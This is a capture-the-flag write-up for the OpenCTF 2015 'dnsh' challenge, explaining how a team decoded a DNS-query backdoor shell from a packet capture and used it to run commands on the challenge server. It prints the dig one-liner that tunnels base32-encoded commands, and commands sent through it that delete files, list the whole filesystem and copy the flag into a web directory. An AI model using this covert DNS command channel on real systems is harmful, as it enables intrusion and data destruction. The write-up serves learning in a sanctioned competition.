OpenCTF 2015 - dnsh (botnet,pwnable 100) Writeup


dnsh 100 --- Our IDS picked up this CnC traffic - please ANALyze it -

The provided pcap contains a HTTP request that results in a 404, a bunch of weird DNS queries, followed by the previously 404 request succeeding. Brute force decoding reveals that the DNS queries are a back door shell. The DNS queries are of the form:


Decoding the queries in the pcap shows that the webserver files are in ~/www/files/:

cp /var/www/html/*.swf ~/.
mv *.swf ~/www/files/.

A very quick and dirty script to push commands to the target server was written by Javantea:

dig @ <base32 string>.$(echo -n <base32 string> |md5sum |head -c 32)

For instance, to run [rm ~/www/files/n*], a necessary step to remove all of our flag files after the challenge is completed, you can run the following command:

dig @ OJWSA7RPO53XOL3GNFWGK4ZPNYVA.$(echo -n OJWSA7RPO53XOL3GNFWGK4ZPNYVA |md5sum |head -c 32)

Only a small amount of trouble is caused by the length limitations in DNS queries. Unfortunately the flag doesn't seem to be in any obvious locations near CWD, so instead the whole hard drive is scrubbed:

ls -alR / > www/files/neg9.txt

The flag was then found at /var/www/.hide/ctf_flag.txt. At this point we started hitting length limitations in our DNS queries, so a slightly creative command was written to compress it:

cp /var/w*/.h*/c*.txt www/files/n

Requesting the n document revealed the key:


This was followed by some light trolling to mess with any teams after us:

echo "th3_c@t_is_#1" > flag.txt

Posted on Aug. 12, 2015, 9:10 a.m. by reidb